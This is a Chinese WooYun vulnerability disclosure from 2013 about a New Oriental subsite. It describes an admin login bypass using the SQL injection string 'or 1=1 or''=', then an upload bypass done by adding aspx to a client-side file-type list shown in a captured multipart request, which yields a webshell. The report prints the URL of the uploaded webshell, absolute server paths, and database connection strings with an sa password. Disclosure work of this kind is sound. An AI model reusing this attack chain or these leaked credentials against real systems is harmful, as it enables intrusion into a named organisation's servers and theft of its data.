新东方#某分站系统验证漏洞（猥琐上传shell）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045476

漏洞标题：新东方#某分站系统验证漏洞（猥琐上传shell）

漏洞作者： xlz0iza1

提交时间：2013-12-10 17:58

修复时间：2013-12-15 17:59

公开时间：2013-12-15 17:59

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-10：细节已通知厂商并且等待厂商处理中
2013-12-15：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

新东方#某分站系统验证漏洞,直接万能漏洞登录后台,猥琐构造上传拿shell。

详细说明：

#1：
漏洞地址：http://i-high.xdf.cn/webmanage/
过滤不严 'or 1=1 or''='
#2：成功登录后台

#3:修改文章找上传点,判断后缀名！

好吧，白白高兴一场,还以为能解析了,结果服务器是2008的,俺是小白不睬啊.
#4：既然可以上传,有验证文件类型的地方.找了半天没有找到,抓包试试看。

好了,抓包得到如下重点信息。

头部一段信息：
Referer: http://i-high.xdf.cn/webmanage/system_dntb/uploadImg.aspx
Cookie: ASP.NET_SessionId=yz2sspglgwbq1yekgfiwftkf; uploadFolder=upload/; uploadConfig=F:\high\webmanage\/system_dntb/uploadconfig/default.config; configpath=F:\high\webmanage\/system_dntb/; languages=zh-cn
（上面直接爆出了网站绝对路径）
中间省略掉了....
-----------------------------234272358819541
Content-Disposition: form-data; name="uploadBtn"
ÉÏ ´«
-----------------------------234272358819541
Content-Disposition: form-data; name="file_path"
-----------------------------234272358819541
Content-Disposition: form-data; name="RadioButtonList1"
local
-----------------------------234272358819541
Content-Disposition: form-data; name="File_List$ctl02$check"
on
-----------------------------234272358819541
Content-Disposition: form-data; name="File_List$ctl03$check"
on
-----------------------------234272358819541
Content-Disposition: form-data; name="config_watermark"
false
-----------------------------234272358819541
Content-Disposition: form-data; name="config_watermarkText"
http://i-high.neworiental.org
-----------------------------234272358819541
Content-Disposition: form-data; name="config_watermarkImages"
false
-----------------------------234272358819541
Content-Disposition: form-data; name="config_watermakOption"
off
-----------------------------234272358819541
Content-Disposition: form-data; name="config_watermarkImages_path"
../system_dntb/upload/logo.gif
-----------------------------234272358819541
Content-Disposition: form-data; name="config_smallImages"
true
-----------------------------234272358819541
Content-Disposition: form-data; name="config_smallImagesName"
wap
-----------------------------234272358819541
Content-Disposition: form-data; name="config_maxAllUploadSize"
2048000
-----------------------------234272358819541
Content-Disposition: form-data; name="config_autoname"
false
-----------------------------234272358819541
Content-Disposition: form-data; name="config_allowUpload"
true
-----------------------------234272358819541
Content-Disposition: form-data; name="config_fileFilters"
jpg,gif,png             //重点找到了,好吧这样判断文件就不安全了哦,哈哈.直接加一个aspx
-----------------------------234272358819541
Content-Disposition: form-data; name="config_maxSingleUploadSize"
1024
-----------------------------234272358819541
Content-Disposition: form-data; name="config_fileListBox"
true
-----------------------------234272358819541
Content-Disposition: form-data; name="config_watermarkImagesName"
false
-----------------------------234272358819541
Content-Disposition: form-data; name="config_watermarkName"
false
-----------------------------234272358819541
Content-Disposition: form-data; name="config_smallImagesType"
W
-----------------------------234272358819541
Content-Disposition: form-data; name="config_smallImagesW"
120
-----------------------------234272358819541
Content-Disposition: form-data; name="config_smallImagesH"
150
-----------------------------234272358819541
Content-Disposition: form-data; name="config_type"
Images
-----------------------------234272358819541--

上传既然既然说内存不足,坑爹的吗？

[ 您已经使用了：549.01MB，还有：1450.99MB的上传空间，单个文件限制：1.00MB ]

试试访问看看文件存在没有,没有想到走了狗屎运.

漏洞证明：

#1：漏洞证明
嘎嘎,服务器重要文件好多啊.

数据库信息.
		<add key="tjConstr" value="server=172.16.16.240;database=i-high;uid=sa;pwd=zxbh!#2008;"></add>
		<add key="tjConstr01" value="server=172.16.16.240;database=dnt2_db;uid=sa;pwd=zxbh!#2008;"></add>

服务器上面源码等一些用户信息.

还可以进行内网渗透哦,不过测试就到这里,rank20有木有，礼物有木有.呵呵~
一句话木马地址麻烦管理员删：http://i-high.xdf.cn/webmanage/system_dntb/upload/xiao9.aspx

修复方案：

#1 安全是一个整体，保证安全不在于强大的地方有多强大，而在于真正薄弱的地方在哪里。
#2 杜绝系统配置错误
#3 妥善的对边界网络进行设置

版权声明：转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-12-15 17:59

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045476

漏洞标题：新东方#某分站系统验证漏洞（猥琐上传shell）

相关厂商：新东方

漏洞作者： xlz0iza1

提交时间：2013-12-10 17:58

修复时间：2013-12-15 17:59

公开时间：2013-12-15 17:59

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045476

漏洞标题：新东方#某分站系统验证漏洞（猥琐上传shell）

相关厂商：新东方

漏洞作者： xlz0iza1

提交时间：2013-12-10 17:58

修复时间：2013-12-15 17:59

公开时间：2013-12-15 17:59

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-045476"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xlz0iza1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：